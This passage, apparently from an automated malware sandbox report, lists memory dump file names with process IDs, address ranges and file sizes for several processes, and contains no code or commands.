memory/5340-293-0x0000000000460000-0x0000000000461000-memory.dmpFilesize
4KB
-
memory/5356-390-0x0000000000000000-mapping.dmp
-
memory/5456-351-0x0000000000000000-mapping.dmp
-
memory/5464-306-0x0000000002850000-0x0000000002852000-memory.dmpFilesize
8KB
-
memory/5464-301-0x00000000008A0000-0x00000000008A1000-memory.dmpFilesize
4KB
-
memory/5464-296-0x0000000000000000-mapping.dmp
-
memory/5480-405-0x00000000033E0000-0x00000000033E1000-memory.dmpFilesize
4KB
-
memory/5480-411-0x0000000003440000-0x0000000003441000-memory.dmpFilesize
4KB
-
memory/5480-415-0x0000000003480000-0x0000000003481000-memory.dmpFilesize
4KB
-
memory/5480-414-0x0000000003470000-0x0000000003471000-memory.dmpFilesize
4KB
-
memory/5480-416-0x0000000003490000-0x0000000003491000-memory.dmpFilesize
4KB
-
memory/5480-408-0x0000000003410000-0x0000000003411000-memory.dmpFilesize
4KB
-
memory/5480-413-0x0000000003460000-0x0000000003461000-memory.dmpFilesize
4KB
-
memory/5480-406-0x00000000033F0000-0x00000000033F1000-memory.dmpFilesize
4KB
-
memory/5480-412-0x0000000003450000-0x0000000003451000-memory.dmpFilesize
4KB
-
memory/5480-407-0x0000000003400000-0x0000000003401000-memory.dmpFilesize
4KB
-
memory/5480-396-0x0000000000000000-mapping.dmp
-
memory/5480-401-0x00000000021A0000-0x00000000021A1000-memory.dmpFilesize
4KB
-
memory/5480-417-0x00000000034A0000-0x00000000034A1000-memory.dmpFilesize
4KB
-
memory/5480-410-0x0000000003430000-0x0000000003431000-memory.dmpFilesize
4KB
-
memory/5480-409-0x0000000003420000-0x0000000003421000-memory.dmpFilesize
4KB
-
memory/5496-375-0x0000000000000000-mapping.dmp
-
memory/5524-383-0x0000000000000000-mapping.dmp
-
memory/5568-356-0x0000000000000000-mapping.dmp
-
memory/5640-323-0x0000000000710000-0x0000000000711000-memory.dmpFilesize
4KB
-
memory/5640-307-0x0000000000000000-mapping.dmp
-
memory/5640-335-0x0000000002810000-0x0000000002812000-memory.dmpFilesize
8KB
-
memory/5780-427-0x0000000000000000-mapping.dmp
-
memory/5796-324-0x0000000000000000-mapping.dmp
-
memory/5796-328-0x00000000001B0000-0x00000000001B1000-memory.dmpFilesize
4KB
-
memory/5796-337-0x000000001ACD0000-0x000000001ACD2000-memory.dmpFilesize
8KB
-
memory/5804-361-0x0000000000000000-mapping.dmp
-
memory/5804-364-0x00000000000F0000-0x00000000000F1000-memory.dmpFilesize
4KB
-
memory/5804-385-0x0000000004C20000-0x0000000004C21000-memory.dmpFilesize
4KB
-
memory/5804-376-0x0000000000B10000-0x0000000000B11000-memory.dmpFilesize
4KB
-
memory/5804-372-0x0000000000AC0000-0x0000000000AF7000-memory.dmpFilesize
220KB
-
memory/5804-369-0x0000000000AA0000-0x0000000000AA1000-memory.dmpFilesize
4KB
-
memory/5828-362-0x0000000000000000-mapping.dmp
-
memory/5880-381-0x0000000000000000-mapping.dmp
-
memory/5880-393-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/5916-338-0x000000001B0A0000-0x000000001B0A2000-memory.dmpFilesize
8KB
-
memory/5916-333-0x0000000000380000-0x0000000000381000-memory.dmpFilesize
4KB
-
memory/5916-331-0x0000000000000000-mapping.dmp
-
memory/6060-370-0x0000000000000000-mapping.dmp
-
memory/6088-357-0x0000000004E20000-0x00000000050A6000-memory.dmpFilesize
2.5MB
-
memory/6088-340-0x00000000004E0000-0x00000000004E1000-memory.dmpFilesize
4KB
-
memory/6088-336-0x0000000000000000-mapping.dmp
-
memory/6108-377-0x0000000000000000-mapping.dmp